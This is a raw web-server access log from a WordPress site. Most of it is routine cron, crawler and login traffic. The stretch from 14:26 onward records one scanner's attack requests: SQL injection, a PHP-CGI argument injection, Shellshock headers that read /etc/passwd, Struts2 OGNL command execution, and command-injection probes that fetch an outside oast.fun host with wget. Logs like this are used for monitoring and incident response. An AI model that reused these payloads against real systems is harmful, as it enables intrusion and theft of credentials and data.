157.66.27.54 - - [13/Jan/2026:07:21:42 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"
103.4.122.14 - - [13/Jan/2026:07:21:49 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:08:16:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768263402.7947959899902343750000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
65.38.25.38 - - [13/Jan/2026:08:16:38 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
103.4.122.14 - - [13/Jan/2026:08:26:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768263994.4910070896148681640625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
173.252.82.14 - - [13/Jan/2026:08:26:32 +0800] "GET /robots.txt HTTP/1.1" 200 67 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
103.4.122.14 - - [13/Jan/2026:08:26:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768263999.0147669315338134765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:08:26:37 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:09:13:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768266832.2016019821166992187500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
216.18.207.11 - - [13/Jan/2026:09:13:48 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0"
103.4.122.14 - - [13/Jan/2026:10:07:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768270052.9511818885803222656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
35.92.160.99 - - [13/Jan/2026:10:07:29 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"
103.4.122.14 - - [13/Jan/2026:10:07:36 +0800] "POST /wp-admin/admin-post.php HTTP/1.1" 200 32 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:10:42:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768272175.9299769401550292968750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
44.251.251.203 - - [13/Jan/2026:10:42:52 +0800] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)"
44.251.251.203 - - [13/Jan/2026:10:42:56 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)"
103.4.122.14 - - [13/Jan/2026:10:43:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768272180.5012590885162353515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:10:42:58 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:11:01:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768273300.6221089363098144531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
217.76.158.107 - - [13/Jan/2026:11:01:36 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
103.4.122.14 - - [13/Jan/2026:11:40:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768275622.1983399391174316406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
35.95.83.186 - - [13/Jan/2026:11:40:20 +0800] "GET /robots.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)"
35.95.83.186 - - [13/Jan/2026:11:40:22 +0800] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)"
35.95.83.186 - - [13/Jan/2026:11:40:24 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)"
103.4.122.14 - - [13/Jan/2026:11:40:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768275628.1557219028472900390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:11:40:26 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:11:54:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768276448.8669719696044921875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
147.124.222.213 - - [13/Jan/2026:11:54:05 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0"
103.4.122.14 - - [13/Jan/2026:12:15:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768277751.5705010890960693359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
34.91.19.29 - - [13/Jan/2026:12:15:49 +0800] "GET / HTTP/1.1" 301 - "-" "Scrapy/2.13.4 (+https://scrapy.org)"
34.91.19.29 - - [13/Jan/2026:12:15:53 +0800] "GET / HTTP/1.1" 200 16720 "-" "Scrapy/2.13.4 (+https://scrapy.org)"
34.91.65.13 - - [13/Jan/2026:12:17:12 +0800] "GET / HTTP/1.1" 200 16720 "-" "Scrapy/2.13.4 (+https://scrapy.org)"
103.4.122.14 - - [13/Jan/2026:12:24:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768278241.4988911151885986328125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
74.7.243.219 - - [13/Jan/2026:12:23:59 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.48 - - [13/Jan/2026:12:24:02 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.230.55 - - [13/Jan/2026:12:24:01 +0800] "GET /robots.txt HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.230.6 - - [13/Jan/2026:12:24:02 +0800] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
103.4.122.14 - - [13/Jan/2026:12:24:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768278245.4334149360656738281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
74.7.230.55 - - [13/Jan/2026:12:24:03 +0800] "GET /robots.txt HTTP/1.1" 200 69 "https://www.nutritaste.com.au/robots.txt" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
180.190.31.120 - - [13/Jan/2026:13:27:47 +0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.2; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/10.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:13:47:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768283270.7332949638366699218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
57.128.117.142 - - [13/Jan/2026:13:47:47 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"
103.4.122.14 - - [13/Jan/2026:13:56:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768283797.8811728954315185546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
93.158.127.79 - - [13/Jan/2026:13:56:36 +0800] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Android 14; Mobile; rv:123.0) Gecko/123.0 Firefox/123"
192.121.134.92 - - [13/Jan/2026:13:56:39 +0800] "GET / HTTP/1.1" 200 16322 "http://nutritaste.com.au/" "Mozilla/5.0 (Android 14; Mobile; rv:123.0) Gecko/123.0 Firefox/123"
103.4.122.14 - - [13/Jan/2026:13:56:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768283802.1238710880279541015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:13:56:40 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
192.36.53.210 - - [13/Jan/2026:13:56:43 +0800] "GET /brochure/ HTTP/1.1" 200 11512 "-" "Mozilla/5.0 (Android 14; Mobile; rv:123.0) Gecko/123.0 Firefox/123"
165.232.54.158 - - [13/Jan/2026:14:26:15 +0800] "POST /scripts/setup.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:26:16 +0800] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/114.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:26:16 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:26:16 +0800] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (X11; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:14:26:18 +0800] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:26:19 +0800] "POST /user.action HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
103.4.122.14 - - [13/Jan/2026:14:26:21 +0800] "POST /wp-cron.php?doing_wp_cron=1768285581.2339110374450683593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:14:26:19 +0800] "POST /?wordfence_syncAttackData=1768285579.584 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:26:17 +0800] "POST /webadmin/auth/verification.php HTTP/1.1" 404 10859 "https://nutritaste.com.au/webadmin/start/" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:14:26:22 +0800] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/106.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:26:19 +0800] "POST /webtools/control/xmlrpc HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET /cgi-bin/status HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET /cgi-bin/test.cgi HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET /cgi-bin/test HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Avira/134.0.0.0"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET / HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET /cgi-bin/stats HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET /cgi-bin/status/status.cgi HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET /test.cgi HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET /debug.cgi HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0"
165.232.54.158 - - [13/Jan/2026:14:26:41 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" 403 199 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/117.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:26:44 +0800] "POST /?q=node&destination=node HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
103.4.122.14 - - [13/Jan/2026:14:26:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768285607.7010920047760009765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:26:44 +0800] "POST /axis2/axis2-admin/login HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:26:44 +0800] "POST /axis2-admin/login HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Debian; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:14:26:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768285611.4582579135894775390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:26:48 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Safari/604.1"
165.232.54.158 - - [13/Jan/2026:14:26:48 +0800] "GET /?XDEBUG_SESSION_START=38Btk8paA7nEJo6AOHCxIHlTuCY HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/125.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/119.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/129.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:27:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768285673.7620019912719726562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:14:27:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768285673.7624909877777099609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:27:50 +0800] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1"
110.235.168.132 - - [13/Jan/2026:14:29:08 +0800] "GET /wp-json/wp/v2/users HTTP/1.1" 403 199 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
103.4.122.14 - - [13/Jan/2026:14:30:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768285840.2310609817504882812500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
110.235.168.132 - - [13/Jan/2026:14:30:37 +0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Opera/67.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:32:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768285934.9602560997009277343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
110.235.168.132 - - [13/Jan/2026:14:32:11 +0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.2; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Opera/77.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:33:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768286020.9159340858459472656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
110.235.168.132 - - [13/Jan/2026:14:33:38 +0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Linux; Android 10; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/81.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:34:43 +0800] "POST /website/blog/ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:14:34:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768286083.6248869895935058593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:34:40 +0800] "GET /backupmgt/localJob.php?session=fail;wget+http://d5iu610i9qj8svou82p0168y4gscgciq4.oast.fun; HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:34:42 +0800] "POST /index.php HTTP/1.1" 404 10793 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8"
165.232.54.158 - - [13/Jan/2026:14:34:50 +0800] "POST /_search HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
103.4.122.14 - - [13/Jan/2026:14:34:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768286093.3200309276580810546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:14:34:50 +0800] "GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d5iu610i9qj8svou82p04yio5s3ceeje4.oast.fun; HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:14:34:52 +0800] "POST /lcms/index.php HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/110.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:14:35:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768286100.4172999858856201171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
110.235.168.132 - - [13/Jan/2026:14:34:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
